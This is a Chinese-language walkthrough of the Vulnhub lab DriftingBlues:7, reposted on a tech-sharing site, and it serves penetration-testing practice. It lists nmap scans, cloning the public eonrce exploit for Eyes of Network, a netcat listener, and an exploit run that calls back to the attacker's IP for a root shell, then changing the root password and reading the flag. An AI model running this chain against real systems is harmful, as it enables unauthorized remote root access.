标签：eonrce 查看 58.135 DriftingBlues 端口 Vulnhub https 172.16

Vulnhub-DriftingBlues:7

目录

• • • Vulnhub-DriftingBlues:7
    • • 信息收集
      • • 扫描目标网段
        • 查看端口及服务
        • 查看服务运行的版本
      • 访问网站
      • 提升权限
      • 运行脚本

靶机下载地址：https://www.vulnhub.com/entry/driftingblues-7,680/

信息收集

扫描目标网段

nmap -sP 172.16.58.0/24 

查看端口及服务

nmap -p- 172.16.58.135

查看服务运行的版本

nmap -sV 172.16.58.135 

访问网站

我们从打开的端口进行访问，先打开80端口试一下，结果直接来到一个登陆页面

我们搜索一下Eyes of network，发现可以找到相应的exp
https://github.com/h4knet/eonrce
然后我们把它下载到kali里

git clone https://github.com/h4knet/eonrce.git  

提升权限

接下来我们赋予权限

cd eonrce
chmod +x ./eonrce.py

开启监听

nc -lvp 8888

运行脚本

./eonrce.py https://172.16.58.135 -ip 172.16.58.129 -port 8888

修改root密码

passwd root

然后我们使用ssh连接靶机

ssh 172.16.58.135

输入我们刚才修改的密码

查看文件发现flag.txt

ls -al

打开文件

cat flag.txt

成功获取。

标签：eonrce,查看,58.135,DriftingBlues,端口,Vulnhub,https,172.16
来源： https://blog.csdn.net/m0_56123950/article/details/117714805

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。